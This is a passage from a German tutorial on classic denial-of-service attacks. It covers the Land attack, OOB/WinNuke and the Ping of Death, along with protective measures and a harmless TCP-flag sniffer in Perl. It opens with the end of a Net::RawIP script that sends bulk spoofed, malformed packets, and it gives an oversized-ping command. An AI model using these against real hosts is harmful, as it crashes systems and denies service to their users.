<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
ip => {</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
ihl => 11,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
tot_len => 44,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
tos => 0,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
ttl => 255,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
id => 1999,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
frag_off => 16383,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
protocol => 17,</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
saddr => '1.1.1.1',</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
daddr => $opt_t</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
},</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
generic => {}</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
});</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$p->optset(ip => { type => [@data] , data => [@data] });</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$p->send(0,$opt_n*1000);</tt></blockquote>
<a NAME="3.2"></a><b><font size=+2>3.2 Schutzmassnahmen</font></b>
<blockquote>Die Auswirkungen waren relativ begrenzt, da viele Rechner schon
durch Updates, Patches und Bug-Fixes gegen andere DoS-Attacken gesch&uuml;tzt
waren, und die verschiedenen Systemadministratoren gewisse Vorkehrungen
trafen, um auch diese Attacke wirkungslos erscheinen zu lassen. Eine Besonderheit
von Land war jedoch, dass die weit verbreiteten, und oft an zentralen Knotenpunkten
der Netze installierten Cisco-Router von den Attacken betroffen waren.
<p>Gruns&auml;tzlich sei gesagt, dass solche Test-Angriffe grunds&auml;tzlich
in isolierten lokalen Netzwerken ausgef&uuml;hrt werden sollten, dagerade
Pakete, die fehlerhafte Pr&uuml;fsummen generieren, innerhalb einer Collision
Domain viele TCP/IP Stacks von Arbeitsstationen oder insbesondere auch
Netzwerkdruckern zum Absturz bringen k&ouml;nnen. Alle diese Pakete lassen
sich z.B. auch mit der Broadcast Adresse 255.255.255.255 als Zieladresse
oder mit Multicast-Adressen (224.255.255.255) generieren. Diese werden
dann eventuell auch in benachbarte Netze &uuml;bertragen, weil eventuell
ein VLAN-Switch diese &uuml;bertr&auml;gt.
<p>Das folgende Skript ist v&ouml;llig harmlos, weil es nur die Flags des
TCP-Stacks abfragt. Es kann dazu dienen, das Betriebssystem hinter einer
Firewall zu bestimmen, solange diese keinen eigenen TCP/IP-Stack besitzt,
bzw. die Pakete als Stateful Paket Filter (SPF) einfach nur an einer Seite
durchgereicht werden. Mit diesem Script kann erkannt werden, wie unterschiedlich
Firewalls arbeiten, und wozu so eventuell nichts taugen bzw. ihre Kosten
gerechtfertigt sind:
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #!/usr/bin/perl</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Simple
script for educational purposes</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # It prints
to STDOUT flags tcp packets from ftp server and client</tt>
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; use Net::RawIP;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; require
'getopts.pl';</tt>
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Getopts('i:d:n:');</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; die "Usage
$0 -i &lt;ftp server> -d &lt;eth device> -n &lt;number packet for receive>"</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unless ($opt_d
&amp;&amp; $opt_d &amp;&amp; $opt_n);</tt>
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print "Now
please login to your ftp server\n";</tt>
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
@flags = qw/URG ACK PSH RST SYN FIN/;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$filter = "dst host $opt_i and dst port 21";</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$filter1 = "src host $opt_i and src port 21";</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$psize = 1500;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$device = $opt_d;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$timeout = 500;</tt>
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if(fork()){</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a = new Net::RawIP;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
my $pcap = $a->pcapinit($device,$filter,$psize,$timeout);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
loop $pcap,$opt_n,\,\@a;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
else {</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$b = new Net::RawIP;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
my $pcap = $b->pcapinit($device,$filter1,$psize,$timeout);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
loop $pcap,$opt_n,\,\@a;</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</tt>
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
sub cl {</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$a->bset(substr( $_[2],14));</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
my @fl = $a->get({tcp=></tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
[qw(psh syn fin rst urg ack)]</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
});</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
print "Client -> ";</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
map { print "$flags[$_] "&nbsp; if $fl[$_] } (0..5);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
print "\n"</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</tt>
<p><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
sub sv {</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
$b->bset(substr( $_[2],14));</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
my @fl = $b->get({tcp=></tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
[qw(psh syn fin rst urg ack)]</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
});</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
print "Server -> ";</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
map { print "$flags[$_] "&nbsp; if $fl[$_] } (0..5);</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
print "\n";</tt>
<br><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</tt>
<p>System-Administratoren sollten ihre Router im Intranet stets so konfigurieren,
dass Broadcast-Domains m&ouml;glichst klein bleiben. Leider k&ouml;nnte
es passieren, dass Windows NT-PDCs und -BDCs in grossen Netzwerken nicht
mehr korrekt funktionieren. Entweder man setzt dann in jeder Abteilung
Firewalls ein, die einen eigenen TCP/IP Stack besitzen, oder man schafft
NT-Server im Unternehmen grunds&auml;tzlich ab.</blockquote>
</blockquote>
<a NAME="4.0"></a><b><font size=+3>4.0 OOB (Out of Band)</font></b>
<blockquote>OOB (Out of Band) ist ein Feature von TCP (Trasmission Control
Protocol) das es erlaubt, Daten auserhalb der Reihenfolge (out-of-band)
zu senden. Dies ist zum Beispiel n&uuml;tzlich f&uuml;r die Behandlung
von [Ctrl]+[C] in Telnet-Verbindungen. Weniger n&uuml;tzlich wenn am anderen
Ende was ausreichend altes von Microsoft h&auml;ngt - dieses mag OOB-Daten
an vielen Stellen garnicht.
<p>Schuld an der M&ouml;glichkeit einer solchen Attacke war die fehlerhafte
Implementierung von NetBEUI durch Microsoft: Sobald &uuml;ber die Ports
135 und 139 ein paar Daten oder wirre Zeichen eintrafen, die nicht der
Norm entsprachen, st&uuml;rzte das betroffene System ab.
<p>Das erste OOB-Tool war WinNuke, und erblickte laut verschiedenen Quellen
am 7. Mai 1997 die Welt. Durch IRC (Internet Relay Chat) und verschiedene
Newsgroups erreichte WinNuke bald eine gewisse Popularit&auml;t und Verbreitung.
OOB-Attacken verlieren jedoch zunehmends an Bedeutung, da Windows 98 und
2000 gegen solche Angriffe bereits gefeilt ist. Bei Windows 95 und NT mussten
noch Updates installiert werden, um diese Attacke wirkungslos erscheinen
zu lassen.
<p>Erschreckend ist ganz sicher die unglaubliche Einfachheit und Primitivit&auml;t
dieses Fehlers, der dazu f&uuml;hrte, dass es in k&uuml;rzester Zeit eine
Unmenge von OOB-Nuke-Tools gab. Die OOB-Nuker wurden stetig perfektioniert:
So konnte man neben Massen-Nuke auch "Abschiessgr&uuml;nde" senden und
anschliessend sogar verifizieren lassen, ob der Rechner des Opfers tats&auml;chlich
crashte, indem versucht wurde der Zielrechner mit einem ICMP-Ping zu erreichen.</blockquote>
<a NAME="5.0"></a><b><font size=+3>5.0 IP-Fragmentierung (Ping of Death)</font></b>
<blockquote>Ein einzelnes IP-Paket ist inklusive Header maximal 65'535
Bytes lang, Ethernet-Pakete k&ouml;nnen jedoch maximale 1'500 Bytes Daten
&uuml;bertragen. Gr&ouml;ssere Pakete werden fragmentiert und beim Empf&auml;nger
wieder defragmentiert, wobei die Zusammensetzung anhand eines Offset-Wertes
erfolgt. Dies wird gemacht, um Netzwerkabschnitte zu &uuml;berwinden, welche
lediglich eine maximale Paketl&auml;nge unterst&uuml;tzen. Jedes Paketfragment
erh&auml;lt neben dem Offset-Wert auch noch eine Identifikationsnummer,
aber nur das erste enth&auml;lt den TCP-Header und damit die Port-Nummer.
Dieser Offset-Wert bestimmt f&uuml;r jedes Fragment, wohin es geh&ouml;rt
oder wohin es soll. Dadurch ist es m&ouml;glich, dem letzten Fragment einen
Offset zu geben, der inklusive Fragmentgr&ouml;sse einen gr&ouml;sseren
Wert als die maximalen 65'535 Bytes ergibt. Dieses &uuml;bergrosse Ping-Paket
erzeugt anschliessend einen Buffer-Overflow. Dieser Angriff funktioniert
nicht nur mit ICMP und Ping, sondern auch mit UDP und TCP. Obwohl ein ordentlicher
Ping-Befehl keine Pakete gr&ouml;sser als 65'507 Bytes (65'535 Bytes abz&uuml;glich
20 Bytes IP-Header und 8 Bytes ICMP-Header) zul&auml;sst, bot bei den ersten
Versionen von Windows 95 der dort implementierte Ping-Befehl das antsprechende
Feature in Form eines Parameters. Einfach "<tt>ping -l 65510 zielhost</tt>"
eingeben, und der Todes-Ping wird ausgef&uuml;hrt.
<p><a NAME="5.1"></a><b><font size=+2>5.1 Angriffsm&ouml;glichkeiten</font></b>
